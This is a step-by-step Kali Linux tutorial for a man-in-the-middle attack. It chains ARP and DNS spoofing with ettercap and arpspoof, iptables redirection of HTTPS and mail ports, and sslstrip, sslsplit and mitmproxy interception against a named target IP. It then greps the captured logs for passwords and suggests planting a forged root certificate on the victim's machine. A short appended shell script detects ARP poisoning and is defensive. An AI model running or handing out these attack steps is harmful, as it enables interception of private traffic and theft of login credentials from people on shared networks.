Advanced tutorial: DNS spoofing on Kali Linux:

Generate a private key with openssl:

root@kali:~# openssl genrsa -out ca.key 2048

Generate a certificate signed with the generated private key:

root@kali:~# openssl req -new -x509 -days 1096 -key ca.key -out ca.crt

Enable IP forwarding on the internal network:

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali:~# arpspoof -i wlan0 -t 135.24.67.83 192.168.0.1

View the iptables rules:

root@kali:~# iptables -t nat -L -n

Flush the iptables rules:

root@kali:~# iptables -t nat -F

Check whether ports 80/443 are in use:

root@kali:~# netstat -tulnp | grep 80
root@kali:~# netstat -tulnp | grep 443

Redirect port 80 traffic to port 8080:

root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080

Redirect port 443 traffic to port 8443:

root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443

Redirect MSA (mail submission agent) traffic:

root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443

Redirect SMTPS (simple mail transfer) traffic:

root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443

Redirect IMAPS (mail retrieval) traffic:

root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443

Redirect POP3S (mail transfer) traffic:

root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443

View the iptables rules again:

root@kali:~# iptables -t nat -L -n

Run the arpspoof spoofing:

root@kali:~# arpspoof -i wlan0 -t 135.24.67.83 192.168.0.1

Edit the hosts file used by ettercap (etter.dns):

root@kali:~# vim /usr/share/ettercap/etter.dns

www.xxx.xxx.com  A 127.0.0.1

Use ettercap to perform ARP + DNS spoofing against the target host:

root@kali:~# route -n
root@kali:~# ettercap
root@kali:~# ettercap -Tq -i wlan0 -P dns_spoof -M arp:remote //135.24.67.83// //192.168.1.1//

Start sslstrip:

root@kali:~# sslstrip -a -f -k
root@kali:~# ettercap -Tq -i wlan0

Edit the configuration file used for sslstrip:

root@kali:~# vim  /etc/ettercap/etter.conf

Uncomment the following two lines (remove the leading #):

# if you use iptables:

  redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

  redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

sslstrip listens on port 8080:

root@kali:~# sslstrip -l 8080
root@kali:~# cat sslstrip.log

Create the directory:

root@kali:~# mkdir -p /root/test/logdir/

Listen on ports 8080 and 8443:

root@kali:~# sslsplit -D -l connect.log -j /root/test -S /root/test/logdir -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
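Note: if this does not succeed, generate the ca.crt certificate again. Once the target browses web pages on the LAN and submits a login form, the certificate log can be viewed from the terminal to see the detailed HTTP fingerprint information.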

View network traffic:

root@kali:~# tcpdump arp
root@kali:~# tcpdump host 135.24.67.83 and 192.168.0.105
root@kali:~# mkdir /root/test/logdir/
root@kali:~/test/logdir# ls
root@kali:~/test/logdir# grep 456456 *
root@kali:~/test/logdir# grep password *
Note: to avoid certificate errors, copy the generated ca.crt root certificate to the victim's machine and install it.

mitmproxy certificate spoofing:

root@kali:~# mitmproxy -T --host -w mitmproxy.log

View the log:

root@kali:~# ll mitmproxy.log
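
Detecting the ARP poisoning from the victim's side (an added example, not part of the original tutorial): the arpspoof and ettercap steps above leave the gateway's IP mapped to a different MAC in the victim's neighbour cache, often one that another LAN host also uses. The helper name check_gateway_arp, the sample tables and the MAC addresses are constructed for illustration; the input is assumed to be `ip neigh show` output.

```shell
#!/bin/sh
# Added example (not from the original tutorial): spot a poisoned gateway entry
# in a host's neighbour (ARP) cache. Input is `ip neigh show` text on stdin.
# check_gateway_arp is a hypothetical helper name; the sample data is constructed.

# Usage: ip neigh show | check_gateway_arp GATEWAY_IP [KNOWN_GOOD_MAC]
# Exit status: 0 nothing suspicious, 1 suspicious, 2 gateway not in the table.
check_gateway_arp() {
    awk -v gw="$1" -v pinned="$(printf '%s' "${2:-}" | tr 'A-F' 'a-f')" '
    {
        mac = ""
        for (i = 1; i < NF; i++)            # find the lladdr field, if present
            if ($i == "lladdr") mac = tolower($(i + 1))
        if (mac == "" || $1 ~ /:/) next     # unresolved entry, or IPv6 neighbour
        seen[$1] = mac
    }
    END {
        if (!(gw in seen)) { print "UNKNOWN " gw " not in table"; exit 2 }
        rc = 0
        # Check 1: the gateway MAC differs from the one recorded when trusted.
        if (pinned != "" && seen[gw] != pinned) {
            print "ALERT " gw " is at " seen[gw] ", expected " pinned
            rc = 1
        }
        # Check 2: another IPv4 neighbour answers with the gateway MAC.
        for (ip in seen)
            if (ip != gw && seen[ip] == seen[gw]) {
                print "ALERT " gw " shares MAC " seen[gw] " with " ip
                rc = 1
            }
        if (rc == 0) print "OK " gw " is at " seen[gw]
        exit rc
    }'
}

# Constructed sample tables (addresses and MACs are made up).
SAMPLE_CLEAN='192.168.0.1 dev wlan0 lladdr 02:00:00:00:00:01 REACHABLE
192.168.0.105 dev wlan0 lladdr 02:00:00:00:00:69 STALE
192.168.0.50 dev wlan0  FAILED'
SAMPLE_POISONED='192.168.0.1 dev wlan0 lladdr 02:00:00:00:00:69 REACHABLE
192.168.0.105 dev wlan0 lladdr 02:00:00:00:00:69 STALE'

printf '%s\n' "$SAMPLE_CLEAN"    | check_gateway_arp 192.168.0.1 || true
printf '%s\n' "$SAMPLE_POISONED" | check_gateway_arp 192.168.0.1 || true
```

A shared MAC can be legitimate (for example a router holding several addresses), so treat check 2 as a prompt to investigate and prefer the pinned-MAC comparison where the gateway's real MAC is known.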
